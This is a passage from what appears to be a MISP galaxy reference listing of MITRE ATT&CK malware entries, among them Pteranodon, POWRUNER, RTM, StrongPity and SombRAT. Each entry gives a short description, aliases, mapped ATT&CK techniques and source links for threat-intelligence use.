uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 4882. Table References
Links
https://attack.mitre.org/software/S0417
https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

Pteranodon - S0147

[Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017)

The tag is: misp-galaxy:mitre-malware="Pteranodon - S0147"

Pteranodon - S0147 is also known as:

Pteranodon

View relationships graph

Pteranodon - S0147 has relationships with:

similar: misp-galaxy:malpedia="Pteranodon" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4883. Table References
Links
https://attack.mitre.org/software/S0147
https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/

build_downer - S0471

[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="build_downer - S0471"

build_downer - S0471 is also known as:

build_downer

View relationships graph

build_downer - S0471 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 4884. Table References
Links
https://attack.mitre.org/software/S0471
https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

POWRUNER - S0184

[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)

The tag is: misp-galaxy:mitre-malware="POWRUNER - S0184"

POWRUNER - S0184 is also known as:

POWRUNER

View relationships graph

POWRUNER - S0184 has relationships with:

similar: misp-galaxy:malpedia="POWRUNER" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 4885. Table References
Links
https://attack.mitre.org/software/S0184
https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

ViceLeaker - S0418

[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)

The tag is: misp-galaxy:mitre-malware="ViceLeaker - S0418"

ViceLeaker - S0418 is also known as:

ViceLeaker
Triout

View relationships graph

ViceLeaker - S0418 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote File Copy - T1544" with estimative-language:likelihood-probability="almost-certain"

Table 4886. Table References
Links
https://attack.mitre.org/software/S0418
https://securelist.com/fanning-the-flames-viceleaker-operation/90877/
https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/

RTM - S0148

[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)

The tag is: misp-galaxy:mitre-malware="RTM - S0148"

RTM - S0148 is also known as:

RTM
Redaman

View relationships graph

RTM - S0148 has relationships with:

similar: misp-galaxy:malpedia="RTM" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 4887. Table References
Links
https://attack.mitre.org/software/S0148
https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/

SimBad - S0419

[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name "SimBad" was derived from the fact that most of the infected applications were simulator games. The adware was controlled using an instance of the open source framework Parse Server.(Citation: CheckPoint SimBad 2019)

The tag is: misp-galaxy:mitre-malware="SimBad - S0419"

SimBad - S0419 is also known as:

SimBad

View relationships graph

SimBad - S0419 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 4888. Table References
Links
https://attack.mitre.org/software/S0419
https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/

MoonWind - S0149

[MoonWind](https://attack.mitre.org/software/S0149) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)

The tag is: misp-galaxy:mitre-malware="MoonWind - S0149"

MoonWind - S0149 is also known as:

MoonWind

View relationships graph

MoonWind - S0149 has relationships with:

similar: misp-galaxy:rat="MoonWind" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="MoonWind" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="MoonWind" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4889. Table References
Links
https://attack.mitre.org/software/S0149
http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

StrongPity - S0491

[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056).(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)

The tag is: misp-galaxy:mitre-malware="StrongPity - S0491"

StrongPity - S0491 is also known as:

StrongPity

View relationships graph

StrongPity - S0491 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

Table 4890. Table References
Links
https://attack.mitre.org/software/S0491
https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

WINDSHIELD - S0155

[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="WINDSHIELD - S0155"

WINDSHIELD - S0155 is also known as:

WINDSHIELD

View relationships graph

WINDSHIELD - S0155 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 4891. Table References
Links
https://attack.mitre.org/software/S0155
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

GoldenEagle - S0551

[GoldenEagle](https://attack.mitre.org/software/S0551) is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="GoldenEagle - S0551"

GoldenEagle - S0551 is also known as:

GoldenEagle

View relationships graph

GoldenEagle - S0551 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"

Table 4892. Table References
Links
https://attack.mitre.org/software/S0551
https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

WellMail - S0515

[WellMail](https://attack.mitre.org/software/S0515) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)

The tag is: misp-galaxy:mitre-malware="WellMail - S0515"

WellMail - S0515 is also known as:

WellMail

View relationships graph

WellMail - S0515 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 4893. Table References
Links
https://attack.mitre.org/software/S0515
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c
https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

SombRAT - S0615

[SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been in use since at least 2019. [SombRAT](https://attack.mitre.org/software/S0615) has been used to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)

The tag is: misp-galaxy:mitre-malware="SombRAT - S0615"

SombRAT - S0615 is also known as:

SombRAT

View relationships graph

SombRAT - S0615 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
